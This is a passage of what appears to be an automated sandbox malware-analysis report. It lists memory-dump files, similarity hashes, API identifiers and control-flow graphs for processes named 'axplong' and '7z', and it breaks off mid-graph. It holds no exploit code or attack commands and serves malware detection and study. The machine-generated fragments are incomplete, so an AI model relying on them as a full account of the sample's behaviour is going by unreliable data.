                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: b2581c7f1509646b3c0c7a80c2de7125be6fa2964579686d45b73ff8e69cba01
                                                                                                                                                                                                        • Instruction ID: 6322cb19ce10701976791ba916bb6595bd341e746fb07350d40710dbcdae649c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2581c7f1509646b3c0c7a80c2de7125be6fa2964579686d45b73ff8e69cba01
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6214F717481055BEF2867E8988A77D72739FD2700F204929E441D67D2CB75494192E7

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 342 66d6ef-66d6fa 343 66d6fc-66d706 342->343 344 66d708-66d70e 342->344 343->344 345 66d73c-66d747 call 667443 343->345 346 66d727-66d738 RtlAllocateHeap 344->346 347 66d710-66d711 344->347 353 66d749-66d74b 345->353 348 66d713-66d71a call 669c81 346->348 349 66d73a 346->349 347->346 348->345 355 66d71c-66d725 call 668cf9 348->355 349->353 355->345 355->346
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0066A6D3,00000001,00000364,00000006,000000FF,?,0066ECFF,?,00000004,00000000,?,?), ref: 0066D730
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: 1ba11ed120c614318ede5d72f987dd8593223260e1832494ffcfcf2b134f1e93
                                                                                                                                                                                                        • Instruction ID: 568bbfe685d9a711165532440922425fcaf5c8f358ebe71a20bae3397da408e2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba11ed120c614318ede5d72f987dd8593223260e1832494ffcfcf2b134f1e93
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98F0E231F4623466DB212F269D01B9B3F8B9F917B0B298116AC04AA281CE21DC0043F3
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                        • API String ID: 3442115484-272389550
                                                                                                                                                                                                        • Opcode ID: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
                                                                                                                                                                                                        • Instruction ID: 9ba308a7af038544f2cc3d8d9f7ff6dd7c1018bd8f7bb6811b480c35120c5073
                                                                                                                                                                                                        • Opcode Fuzzy Hash: afb9cc6d2aba557fd5c28d6c75725cc50b14ac0dfada8b8986538d3579b498c0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB72A172308A8196DF74EF25E4903AE73A1F789B81F409166DB9A47768DF3CC459CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3352498445-0
                                                                                                                                                                                                        • Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                        • Instruction ID: deaa2c6f7cd83d1f097c6134917ac1ad4db4b76ec5424144cde19e35642216bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75824032319A8085CA30EF25E4913AEB3E0F786B94F5481A6DF9D57B59DF78C949CB00

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1635 b747ac-b7485c call b53314 * 2 1640 b7485e-b74884 call b52880 1635->1640 1641 b7489a-b7491b call b76344 call b532bc call b53b5c free * 2 call b53208 call b53314 1635->1641 1640->1641 1647 b74886-b74895 call b53404 1640->1647 1656 b74921-b74925 1641->1656 1657 b749bd-b749cb call b5477c 1641->1657 1647->1641 1656->1657 1659 b7492b-b7495e call b53208 call b5449c 1656->1659 1662 b749d1-b749e7 1657->1662 1663 b74dff 1657->1663 1674 b749b0-b749b8 free 1659->1674 1675 b74960-b7496f 1659->1675 1671 b749e9-b74a28 free * 4 1662->1671 1672 b74a68-b74ad2 call b53208 * 3 1662->1672 1666 b74e02-b74e05 1663->1666 1667 b74e07-b74e1c call b52130 1666->1667 1668 b74e40-b74e45 1666->1668 1687 b74e30 1667->1687 1688 b74e1e-b74e2e call b53314 1667->1688 1676 b74e47-b74e58 call b53518 1668->1676 1677 b74e5d-b74e62 call b570c8 1668->1677 1678 b74a2a 1671->1678 1679 b74a58-b74a63 free 1671->1679 1720 b74d30-b74d3b 1672->1720 1721 b74ad8-b74adb 1672->1721 1674->1657 1681 b74971-b74978 1675->1681 1682 b7497a-b7498b 1675->1682 1695 b74f2c-b74f98 call b63f0c 1676->1695 1693 b74e67-b74e6a 1677->1693 1686 b74a2e-b74a41 1678->1686 1690 b7504a-b75059 free 1679->1690 1681->1682 1689 b74993-b74996 1681->1689 1682->1689 1696 b74a54-b74a56 1686->1696 1697 b74a43-b74a4f free * 2 1686->1697 1700 b74e33-b74e3b call b5b8f0 1687->1700 1688->1700 1689->1674 1699 b74998-b749ad call b53404 1689->1699 1701 b7523b-b7524e 1690->1701 1694 b74e70-b74eea GetLastError call b53518 call b5362c free * 4 1693->1694 1693->1695 1723 b74eec 1694->1723 1724 b74f1a-b74f27 free 1694->1724 1715 b7505e-b75062 1695->1715 1716 b74f9e-b74fa2 1695->1716 1696->1679 1696->1686 1697->1696 1699->1674 1700->1668 1718 b75064-b7506c 1715->1718 1719 b7506e 1715->1719 1716->1715 1722 b74fa8-b74fac 1716->1722 1718->1719 1725 b75071-b7507d 1718->1725 1719->1725 1728 b74d41-b74dae call b62a84 free * 4 1720->1728 1729 b74df0-b74dfd call b62a84 1720->1729 1726 b74b24-b74b3e call b7ec5c 1721->1726 1727 b74add-b74ae0 1721->1727 1722->1715 1730 b74fb2-b74fc7 call b632e8 1722->1730 1732 b74ef0-b74f03 1723->1732 1724->1690 1735 b75083-b750d1 1725->1735 1736 b75152-b7516d 1725->1736 1749 b74b44 1726->1749 1750 b74c9d-b74cee call b62a84 free * 4 1726->1750 1727->1726 1737 b74ae2-b74aee 1727->1737 1788 b74db0 1728->1788 1789 b74dde-b74deb free 1728->1789 1729->1666 1730->1715 1748 b74fcd-b7500d free * 4 1730->1748 1742 b74f15-b74f18 1732->1742 1743 b74f05-b74f10 free * 2 1732->1743 1774 b75143-b75150 call b5ae2c 1735->1774 1775 b750d3-b750de 1735->1775 1746 b75173 1736->1746 1738 b74af0-b74af7 1737->1738 1739 b74b4c-b74b50 1737->1739 1738->1739 1747 b74af9-b74b14 call b7b290 1738->1747 1751 b74b52-b74b5a 1739->1751 1752 b74b60-b74b63 1739->1752 1742->1724 1742->1732 1743->1742 1754 b75175-b7517b 1746->1754 1777 b74c0a-b74c5b call b62a84 free * 4 1747->1777 1778 b74b1a-b74b22 1747->1778 1757 b7500f 1748->1757 1758 b7503d-b75048 free 1748->1758 1749->1739 1783 b74cf0 1750->1783 1784 b74d1e-b74d2b free 1750->1784 1751->1752 1760 b74bf5-b74bff 1751->1760 1761 b74b65-b74b80 call b54318 1752->1761 1762 b74bc1-b74bc4 1752->1762 1764 b75190-b7519e call b91850 1754->1764 1765 b7517d-b75188 call b66cd0 1754->1765 1768 b75013-b75026 1757->1768 1758->1690 1760->1721 1772 b74c05 1760->1772 1797 b74b87-b74b9e 1761->1797 1798 b74b82-b74b85 1761->1798 1769 b74bc6-b74be1 call b643fc 1762->1769 1770 b74be3-b74bf2 call b9c7d4 1762->1770 1795 b751a1-b751a6 1764->1795 1765->1764 1780 b75038-b7503b 1768->1780 1781 b75028-b75033 free * 2 1768->1781 1769->1760 1769->1770 1770->1760 1772->1720 1774->1754 1775->1774 1787 b750e0-b750e3 1775->1787 1816 b74c5d 1777->1816 1817 b74c8b-b74c98 free 1777->1817 1778->1739 1780->1758 1780->1768 1781->1780 1796 b74cf4-b74d07 1783->1796 1784->1690 1802 b750e5-b750e7 1787->1802 1803 b75138-b75140 1787->1803 1804 b74db4-b74dc7 1788->1804 1789->1690 1805 b751b1-b751f1 free * 4 1795->1805 1806 b751a8-b751b0 call b66cd0 1795->1806 1807 b74d19-b74d1c 1796->1807 1808 b74d09-b74d14 free * 2 1796->1808 1800 b74ba0-b74ba8 1797->1800 1801 b74baf-b74bb3 1797->1801 1798->1762 1800->1762 1810 b74baa-b74bad 1800->1810 1801->1762 1811 b74bb5-b74bbd 1801->1811 1812 b7512b-b75136 1802->1812 1813 b750e9-b750eb 1802->1813 1803->1774 1814 b74dd9-b74ddc 1804->1814 1815 b74dc9-b74dd4 free * 2 1804->1815 1819 b751f3 1805->1819 1820 b75221-b75239 free * 2 1805->1820 1806->1805 1807->1784 1807->1796 1808->1807 1810->1762 1811->1762 1812->1774 1822 b7511f-b75129 1813->1822 1823 b750ed-b750f0 1813->1823 1814->1789 1814->1804 1815->1814 1821 b74c61-b74c74 1816->1821 1817->1690 1825 b751f7-b7520a 1819->1825 1820->1701 1828 b74c86-b74c89 1821->1828 1829 b74c76-b74c81 free * 2 1821->1829 1822->1774 1826 b75112-b7511d 1823->1826 1827 b750f2-b75111 _CxxThrowException 1823->1827 1830 b7521c-b7521f 1825->1830 1831 b7520c-b75217 free * 2 1825->1831 1826->1774 1827->1826 1828->1817 1828->1821 1829->1828 1830->1820 1830->1825 1831->1830
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Can not create output directory: , xrefs: 00B74E83
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                        • String ID: Can not create output directory:
                                                                                                                                                                                                        • API String ID: 4159955631-3123869724
                                                                                                                                                                                                        • Opcode ID: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                        • Instruction ID: 873869b7459b605c95cbc721151946459947a51af039a7b0cceaffc4150249aa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3426023316AC096CA30EB25E4903AEB3A1F7C6B81F545192DF9D57B19DF78C959CB00

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 2037 b75458-b754e2 2038 b754e4-b754f0 2037->2038 2039 b754f2-b754f6 2037->2039 2040 b754fe-b75504 2038->2040 2039->2040 2041 b755ec-b755fd 2040->2041 2042 b7550a 2040->2042 2044 b75612-b75615 2041->2044 2045 b755ff-b7560a call b52130 2041->2045 2043 b7550d-b75538 call b57d28 call b53208 2042->2043 2058 b7556c-b7559c call b5b8f0 free 2043->2058 2059 b7553a-b7554c call b57ebc 2043->2059 2048 b75617-b7561f memset 2044->2048 2049 b75624-b75639 call b52130 2044->2049 2045->2044 2048->2049 2056 b7563b-b7563e call b63524 2049->2056 2057 b75648 2049->2057 2066 b75643-b75646 2056->2066 2061 b7564b-b75656 2057->2061 2058->2043 2074 b755a2 2058->2074 2068 b75551-b75554 2059->2068 2062 b75662-b756d1 call b743b0 2061->2062 2063 b75658-b75661 2061->2063 2076 b756d3-b756e3 2062->2076 2077 b756fd-b75715 2062->2077 2063->2062 2066->2061 2072 b75556-b75562 2068->2072 2073 b755a4-b755c7 _CxxThrowException 2068->2073 2075 b755c8-b755eb _CxxThrowException 2072->2075 2078 b75564 2072->2078 2073->2075 2074->2041 2075->2041 2076->2077 2086 b756e5-b756f8 free 2076->2086 2079 b75f1d-b75f22 2077->2079 2080 b7571b-b7571e 2077->2080 2078->2058 2081 b75f24-b75f27 2079->2081 2082 b75f29-b75f3d 2079->2082 2084 b75726-b7572a 2080->2084 2081->2082 2085 b75f8d-b76002 free * 2 2081->2085 2094 b75f54-b75f67 2082->2094 2095 b75f3f-b75f52 free 2082->2095 2087 b75c37-b75c50 2084->2087 2088 b75730-b7575f call b57d28 call b53208 2084->2088 2098 b76004-b76017 2085->2098 2099 b75f7c-b75f8b free 2086->2099 2087->2084 2090 b75c56-b75c5a 2087->2090 2103 b75772-b7577e call b57ebc 2088->2103 2104 b75761-b75770 2088->2104 2090->2079 2094->2085 2105 b75f69-b75f7b free 2094->2105 2095->2099 2099->2098 2109 b75783-b75786 2103->2109 2106 b7579e-b757b4 call b91544 2104->2106 2105->2099 2113 b75c5f-b75c80 free * 2 2106->2113 2114 b757ba-b7586c call b74504 call b742a8 call b740c4 call b53404 call b84c00 2106->2114 2110 b7578c-b75798 2109->2110 2111 b75ef9-b75f1c _CxxThrowException 2109->2111 2110->2106 2110->2111 2111->2079 2113->2099 2126 b7586e-b75876 2114->2126 2127 b7587d-b75883 2114->2127 2128 b75889-b758b3 call b91bc0 2126->2128 2129 b75878 2126->2129 2127->2128 2130 b75c85-b75c9e free 2127->2130 2136 b75d02-b75d1e free 2128->2136 2137 b758b9-b758bc 2128->2137 2129->2127 2131 b75ca0 2130->2131 2132 b75cbe-b75cfd free call b74610 free * 2 2130->2132 2134 b75ca4-b75cbc free 2131->2134 2132->2099 2134->2132 2134->2134 2139 b75d20 2136->2139 2140 b75d3e-b75d7b free call b74610 free * 2 2136->2140 2141 b758c2-b758d3 2137->2141 2142 b759b1-b759bd 2137->2142 2146 b75d24-b75d3c free 2139->2146 2140->2099 2148 b758d5-b75907 call b57d28 call b53208 call b57ebc 2141->2148 2149 b75933 2141->2149 2144 b759c3-b759cd 2142->2144 2145 b75a8e-b75a93 2142->2145 2152 b75a95-b75a9a 2144->2152 2153 b759d3-b759e1 2144->2153 2151 b75aa1-b75ab9 2145->2151 2146->2140 2146->2146 2189 b75924-b75931 free 2148->2189 2190 b75909-b75915 2148->2190 2155 b75936-b7594f free 2149->2155 2159 b75acc 2151->2159 2160 b75abb-b75ac3 2151->2160 2152->2151 2157 b75a55-b75a58 2153->2157 2158 b759e3-b759ed 2153->2158 2161 b75951 2155->2161 2162 b7596f-b759ac free call b74610 free 2155->2162 2168 b75a9c 2157->2168 2169 b75a5a-b75a86 2157->2169 2164 b759f5-b75a11 call b74434 2158->2164 2166 b75acf-b75b54 call b747ac 2159->2166 2160->2159 2165 b75ac5-b75aca 2160->2165 2170 b75955-b7596d free 2161->2170 2162->2087 2181 b75a13-b75a15 2164->2181 2182 b75a21-b75a30 2164->2182 2165->2166 2183 b75dfe-b75e1a free 2166->2183 2184 b75b5a-b75b61 2166->2184 2168->2151 2185 b75d80-b75d9c free 2169->2185 2186 b75a8c 2169->2186 2170->2162 2170->2170 2181->2182 2191 